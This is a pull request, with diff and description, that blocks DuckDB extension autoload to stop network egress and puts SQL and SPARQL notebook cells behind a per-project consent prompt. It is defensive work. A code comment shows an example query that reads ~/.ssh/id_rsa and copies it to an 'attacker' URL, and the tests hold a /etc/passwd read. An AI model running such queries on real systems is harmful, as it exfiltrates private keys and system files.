### PR TITLE
Security H1: gate SQL/SPARQL compute cells + block DuckDB network egress (#1325)

### DIFF
--- a/src/main/sources/tables.ts
+++ b/src/main/sources/tables.ts
@@ -46,6 +46,7 @@ export async function initTablesDb(ctx: ProjectContext): Promise<void> {
   if (store.has(ctx)) return;
   const instance = await DuckDBInstance.create(':memory:');
   const connection = await instance.connect();
+  await hardenConnection(connection);
   store.set(ctx, {
     rootPath: ctx.rootPath,
     instance,
@@ -53,6 +54,31 @@ export async function initTablesDb(ctx: ProjectContext): Promise<void> {
     pathToTable: new Map(),
     tableToPath: new Map(),
   });
+}
+
+/**
+ * Lock down a fresh DuckDB connection before any query runs (#1325).
+ *
+ * The same connection backs the Query Panel AND note-embedded ```sql
+ * compute cells, so an untrusted thoughtbase's cell can run arbitrary
+ * SQL here. DuckDB's `httpfs` extension autoloads on first use of an
+ * `https://`/`s3://` path, which turns a query into a network
+ * exfiltration primitive (`COPY (SELECT … FROM read_text('~/.ssh/id_rsa'))
+ * TO 'https://attacker/…'`). Disabling extension autoinstall/autoload
+ * removes that egress path entirely while leaving the core built-ins the
+ * CSV pipeline relies on (`read_csv_auto`, `read_csv`) fully functional —
+ * they need no extension.
+ *
+ * Local file *read* via core built-ins (`read_text`, `read_csv_auto` of an
+ * arbitrary path) is a core capability we can't drop without breaking CSV
+ * views; that residual is covered by the per-project compute trust gate
+ * (`renderer/lib/compute/run-cell-with-trust.ts`). This is the network
+ * half of the defense-in-depth pair.
+ */
+async function hardenConnection(connection: DuckDBConnection): Promise<void> {
+  await connection.run(
+    'SET autoinstall_known_extensions=false; SET autoload_known_extensions=false;',
+  );
 }
 
 export function disposeProject(ctx: ProjectContext): void {

--- a/src/renderer/lib/compute/run-cell-with-trust.ts
+++ b/src/renderer/lib/compute/run-cell-with-trust.ts
@@ -1,28 +1,53 @@
 /**
- * Trust-gated wrapper around `api.compute.runCell` (#373).
+ * Trust-gated wrapper around `api.compute.runCell` (#373, #1325).
  *
- * Python cells run with the same permissions as Minerva — file
- * system, network, every installed package — so we prompt once per
- * thoughtbase before the first execution. Cancelling the prompt
- * blocks the run; clicking Run records the consent in
- * `.minerva/config.json` so subsequent cells in the same project
- * skip the dialog.
+ * Every executable compute fence runs with real capability, not just
+ * Python — so we prompt once per thoughtbase before the first
+ * execution of ANY of them. Cancelling the prompt blocks the run;
+ * clicking Run records the consent in `.minerva/config.json` so
+ * subsequent cells in the same project skip the dialog.
+ *
+ * The languages that require consent (#1325):
+ *   - `python` — runs with Minerva's full permissions (fs, network,
+ *      every installed package).
+ *   - `sql` — DuckDB is NOT a sandboxed dialect: `read_text`,
+ *      `read_csv_auto`, `read_blob`, `glob(...)` read arbitrary local
+ *      files and `COPY (…) TO '<path>'` writes them. (Network egress
+ *      via the httpfs extension is additionally blocked at the DuckDB
+ *      layer — see `sources/tables.ts` — but local file access is a
+ *      core capability, so consent is still required.)
+ *   - `sparql` — only queries the already-in-memory project graph and
+ *      the rdfjs engine has no HTTP dereference actor (so `SERVICE`
+ *      federation can't reach the network), but it's an executable
+ *      fence and gated for consistency.
  *
  * The dialog flow lives in the renderer (we need a real Svelte
  * confirm dialog), but the trust state is project-scoped — stored
  * via the `compute:get/setPythonTrust` IPCs that read/write the
- * project config. SQL / SPARQL fences pass straight through;
- * they don't execute arbitrary code.
+ * project config. The persisted flag is a single per-project
+ * "run compute cells" consent (its stored name is historical).
  */
 
 import { api } from '../ipc/client';
 import { CONFIRM_KEYS } from '../confirm-keys';
+import { RUNNABLE_LANGUAGE_SET } from '../../../shared/compute/fences';
 import type { CellResult } from '../../../shared/compute/types';
 
-const PYTHON_TRUST_PROMPT = [
-  'Run Python cells in this thoughtbase?',
+/**
+ * The trust gate covers exactly the languages the compute shell can
+ * execute — every one of them runs with real capability (filesystem /
+ * network / arbitrary packages), so consent is required before any of
+ * them run (#1325). We reuse `RUNNABLE_LANGUAGE_SET` (the single source
+ * of truth, kept in sync with the executor registry) rather than a local
+ * list so the two can't drift and aliases like `py` / `python3` can't
+ * slip through the gate.
+ */
+const TRUST_GATED_LANGUAGES = RUNNABLE_LANGUAGE_SET;
+
+const COMPUTE_TRUST_PROMPT = [
+  'Run compute cells in this thoughtbase?',
   '',
-  'Python cells run with the same permissions as Minerva — they can read and write files, make network requests, and import any installed package.',
+  'Compute cells (Python, SQL, SPARQL) run with real capability — they can read and write files on this machine and, for Python, make network requests and import any installed package.',
   '',
   'Only run cells in thoughtbases you trust.',
 ].join('\n');
@@ -44,8 +69,9 @@ export interface TrustGateDeps {
 }
 
 /**
- * Run a cell, gating Python through the per-project trust prompt.
- * Non-Python cells (sparql / sql) pass through unchanged.
+ * Run a cell, gating every executable language (python / sql / sparql)
+ * through the per-project trust prompt (#1325). Non-executable
+ * languages pass through unchanged.
  */
 export async function runCellWithTrust(
   language: string,
@@ -53,11 +79,11 @@ export async function runCellWithTrust(
   notePath: string | undefined,
   deps: TrustGateDeps,
 ): Promise<CellResult> {
-  if (language === 'python') {
+  if (TRUST_GATED_LANGUAGES.has(language.toLowerCase())) {
     const trusted = await api.compute.getPythonTrust();
     if (!trusted) {
       const confirmed = await deps.showConfirm(
-        PYTHON_TRUST_PROMPT,
+        COMPUTE_TRUST_PROMPT,
         CONFIRM_KEYS.pythonTrust,
         'Run',
         { hideDontAskAgain: true },
@@ -65,7 +91,7 @@ export async function runCellWithTrust(
       if (!confirmed) {
         return {
           ok: false,
-          error: 'Python execution declined for this thoughtbase. Open Settings → Compute or re-run a cell to be prompted again.',
+          error: 'Compute execution declined for this thoughtbase. Open Settings → Compute or re-run a cell to be prompted again.',
         };
       }
       await api.compute.setPythonTrust(true);

--- a/src/renderer/lib/confirm-keys.ts
+++ b/src/renderer/lib/confirm-keys.ts
@@ -69,9 +69,12 @@ export const CONFIRM_KEYS = {
   saveCellOutputFailed: 'save-cell-output-failed',
   /** Image-upload rejection toast (#455) — too-large, unsupported MIME, etc. */
   imageUploadFailed: 'image-upload-failed',
-  /** First-run Python trust dialog (#373). The dialog hides the
+  /** First-run compute trust dialog (#373, #1325). Covers every
+   *  executable fence (Python, SQL, SPARQL). The dialog hides the
    *  Don't-ask-again checkbox — consent is project-scoped, not
-   *  machine-scoped, so the localStorage suppression mustn't fire. */
+   *  machine-scoped, so the localStorage suppression mustn't fire.
+   *  The `python-trust` key string is historical (kept so existing
+   *  per-project consent still resolves). */
   pythonTrust: 'python-trust',
   exportComplete: 'export-complete',
   /** Pre-merge confirmation (#464) — surfaced before "Merge note into…" runs. */
@@ -344,9 +347,9 @@ export const CONFIRM_REGISTRY: ConfirmRegistryEntry[] = [
   },
   {
     key: CONFIRM_KEYS.pythonTrust,
-    title: 'Python trust prompt',
+    title: 'Compute trust prompt',
     description:
-      'First-run prompt before Python cells execute in a new thoughtbase (#373). Trust is recorded per-project in `.minerva/config.json`, not per-machine — the dialog hides the Don\'t-ask-again checkbox, and this entry is here so the suppression UI lists the key for completeness but suppressing it has no effect.',
+      'First-run prompt before any compute cell (Python, SQL, or SPARQL) executes in a new thoughtbase (#373, #1325). Trust is recorded per-project in `.minerva/config.json`, not per-machine — the dialog hides the Don\'t-ask-again checkbox, and this entry is here so the suppression UI lists the key for completeness but suppressing it has no effect.',
   },
   {
     key: CONFIRM_KEYS.exportComplete,

--- a/tests/main/sources/tables.test.ts
+++ b/tests/main/sources/tables.test.ts
@@ -38,6 +38,28 @@ describe('tables module — DuckDB lifecycle + runQuery (#232)', () => {
     }
   });
 
+  it('blocks httpfs extension autoload — no network egress from a SQL cell (#1325)', async () => {
+    // A remote read forces DuckDB to autoload `httpfs`; with autoload
+    // disabled at init (hardenConnection) it fails with a Missing Extension
+    // error instead of reaching the network. Loopback host so the assertion
+    // is about the block, not about DNS/connectivity.
+    const result = await runQuery(
+      ctx,
+      "SELECT * FROM read_csv_auto('https://127.0.0.1/leak.csv')",
+    );
+    expect(result.ok).toBe(false);
+    if (!result.ok) {
+      expect(result.error).toMatch(/extension|autoload|httpfs/i);
+    }
+  });
+
+  it('still runs core built-in queries after the extension lockdown (#1325)', async () => {
+    // The lockdown must not touch the built-ins the CSV pipeline relies on.
+    const result = await runQuery(ctx, 'SELECT 1 AS n');
+    expect(result.ok).toBe(true);
+    if (result.ok) expect(result.rows).toEqual([{ n: 1 }]);
+  });
+
   it('handles multi-row / multi-column results with typed values', async () => {
     const result = await runQuery(ctx, `
       SELECT * FROM (VALUES

--- a/tests/renderer/run-cell-with-trust.test.ts
+++ b/tests/renderer/run-cell-with-trust.test.ts
@@ -1,10 +1,11 @@
 /**
- * Per-project Python trust gate (#373).
+ * Per-project compute trust gate (#373, #1325).
  *
  * The wrapper consults `api.compute.getPythonTrust` before firing
- * `runCell` for Python; if untrusted, prompts; if confirmed,
- * persists trust + executes; if cancelled, returns an error result.
- * Non-Python languages pass straight through.
+ * `runCell` for any executable language (python / sql / sparql); if
+ * untrusted, prompts; if confirmed, persists trust + executes; if
+ * cancelled, returns an error result. Non-executable languages pass
+ * straight through, and a single consent covers all three.
  */
 
 import { describe, it, expect, beforeEach, vi } from 'vitest';
@@ -48,21 +49,61 @@ beforeEach(() => {
   calls.runCell = [];
 });
 
-describe('runCellWithTrust (#373)', () => {
-  it('non-Python (sparql) bypasses the trust check entirely', async () => {
+describe('runCellWithTrust (#373, #1325)', () => {
+  it('SQL is trust-gated: untrusted + Cancel blocks execution', async () => {
+    const showConfirm = vi.fn(() => Promise.resolve(false));
+    const r = await runCellWithTrust('sql', "SELECT * FROM read_text('/etc/passwd')", 'note.md', { showConfirm });
+    expect(r.ok).toBe(false);
+    expect(showConfirm).toHaveBeenCalledTimes(1);
+    expect(calls.runCell).toHaveLength(0);
+  });
+
+  it('SQL is trust-gated: untrusted + Run records consent and executes', async () => {
     const showConfirm = vi.fn(() => Promise.resolve(true));
-    const r = await runCellWithTrust('sparql', 'SELECT *', 'note.md', { showConfirm });
+    const r = await runCellWithTrust('sql', 'select 1', 'note.md', { showConfirm });
+    expect(r.ok).toBe(true);
+    expect(showConfirm).toHaveBeenCalledTimes(1);
+    expect(calls.setTrust).toEqual([true]);
+    expect(calls.runCell).toHaveLength(1);
+    expect(calls.runCell[0].language).toBe('sql');
+  });
+
+  it('SPARQL is trust-gated: untrusted shows the prompt', async () => {
+    const showConfirm = vi.fn(() => Promise.resolve(true));
+    await runCellWithTrust('sparql', 'SELECT *', 'note.md', { showConfirm });
+    expect(showConfirm).toHaveBeenCalledTimes(1);
+    expect(calls.getTrust).toBe(1);
+    expect(calls.runCell[0].language).toBe('sparql');
+  });
+
+  it('a single consent covers every executable language (python, then sql, then sparql)', async () => {
+    const showConfirm = vi.fn(() => Promise.resolve(true));
+    await runCellWithTrust('python', 'a = 1', 'note.md', { showConfirm });
+    await runCellWithTrust('sql', 'select 1', 'note.md', { showConfirm });
+    await runCellWithTrust('sparql', 'SELECT *', 'note.md', { showConfirm });
+    // Prompted once; the persisted trust flag suppresses the rest.
+    expect(showConfirm).toHaveBeenCalledTimes(1);
+    expect(calls.runCell).toHaveLength(3);
+  });
+
+  it('Python aliases (py / python3, any case) are gated too, not just "python"', async () => {
+    for (const lang of ['py', 'python3', 'PYTHON', 'Sql']) {
+      trustState.trusted = false;
+      calls.setTrust = [];
+      const showConfirm = vi.fn(() => Promise.resolve(false));
+      const r = await runCellWithTrust(lang, 'x', 'note.md', { showConfirm });
+      expect(r.ok, `${lang} must be gated`).toBe(false);
+      expect(showConfirm).toHaveBeenCalledTimes(1);
+    }
+  });
+
+  it('a non-executable language passes straight through (no gate)', async () => {
+    const showConfirm = vi.fn(() => Promise.resolve(true));
+    const r = await runCellWithTrust('mermaid', 'graph TD; A-->B', 'note.md', { showConfirm });
     expect(r.ok).toBe(true);
     expect(showConfirm).not.toHaveBeenCalled();
     expect(calls.getTrust).toBe(0);
     expect(calls.runCell).toHaveLength(1);
-    expect(calls.runCell[0].language).toBe('sparql');
-  });
-
-  it('non-Python (sql) bypasses too', async () => {
-    const showConfirm = vi.fn(() => Promise.resolve(true));
-    await runCellWithTrust('sql', 'select 1', 'note.md', { showConfirm });
-    expect(showConfirm).not.toHaveBeenCalled();
   });
 
   it('Python with no prior trust shows the prompt; clicking Run records trust + executes', async () => {


### PR DESCRIPTION
Closes #1325.

## Problem
The per-project compute trust prompt gated only Python. SQL and SPARQL cells ran **ungated**, and the wrapper's comment wrongly asserted they "don't execute arbitrary code." That's inaccurate for DuckDB:

- `read_text` / `read_csv_auto` / `read_blob` / `glob(...)` read **arbitrary local files**; `COPY (…) TO '<path>'` **writes** them.
- The `httpfs` extension **autoloads** on first use of an `https://`/`s3://` path, turning a query into a **network exfiltration** primitive.

So a shared/untrusted thoughtbase's ` ```sql ` cell — run when the user clicks ▶ — could silently read `~/.ssh/id_rsa` into cell output or beacon it out, with **none** of the warning the sibling Python path shows.

## Fix (two layers)

**1. Trust gate covers every executable language.** `runCellWithTrust` now gates against the canonical `RUNNABLE_LANGUAGE_SET` (`python`, `py`, `python3`, `sql`, `sparql`) instead of a literal `=== 'python'`. Reusing the single source of truth (kept in sync with the executor registry by an existing test) means aliases can't slip the gate and the list can't drift. A **single per-project consent** covers all of them. Prompt text and the misleading comments are corrected.

**2. DuckDB network lockdown.** `initTablesDb` disables extension autoinstall/autoload, which removes the `httpfs` egress vector entirely while leaving the CSV pipeline's core built-ins (`read_csv_auto`/`read_csv`) fully functional — they need no extension.

Verified empirically before/after:

| Query | Default | Hardened |
|---|---|---|
| `read_text('package.json')` (local) | ✅ works | ✅ works |
| `read_csv_auto('https://…')` (network) | ✅ **works (bad)** | 🚫 **Missing Extension Error** |
| local `read_csv` / `SELECT` | ✅ works | ✅ works |

## SPARQL note
The `@comunica/query-sparql-rdfjs` engine has **no HTTP dereference actor**, so `SERVICE <http://…>` federation can't reach the network (verified: it fails with "no actors able to reply"). SPARQL cells only query the already-in-memory project graph. Gated anyway for consistency and future-proofing.

## Residual (by design)
Local file *read* via core built-ins can't be dropped without breaking CSV views (the shared connection reads CSVs lazily). That residual is exactly what the per-project trust gate now covers — matching the layered model in the review (network capability removed outright; local capability gated behind explicit consent).

## Tests
- `run-cell-with-trust.test.ts`: SQL/SPARQL are now gated (Cancel blocks, Run consents + executes); Python aliases (`py`/`python3`) and mixed case are gated; a single consent covers python→sql→sparql; non-executable fences pass through.
- `tables.test.ts`: httpfs autoload is blocked (no network egress) while core built-in queries still run.
- Full suite: 1587 passing; `pnpm lint` clean.

## Scope
This addresses **H1** only. The follow-up hardening items from the review remain their own issues: M1 (#1326 secrets in plaintext), M2 (#1327 note-preview DOMPurify), M3 (#1328 shell path safety), L1 (#1329 Python sandbox).

🤖 Generated with [Claude Code](https://claude.com/claude-code)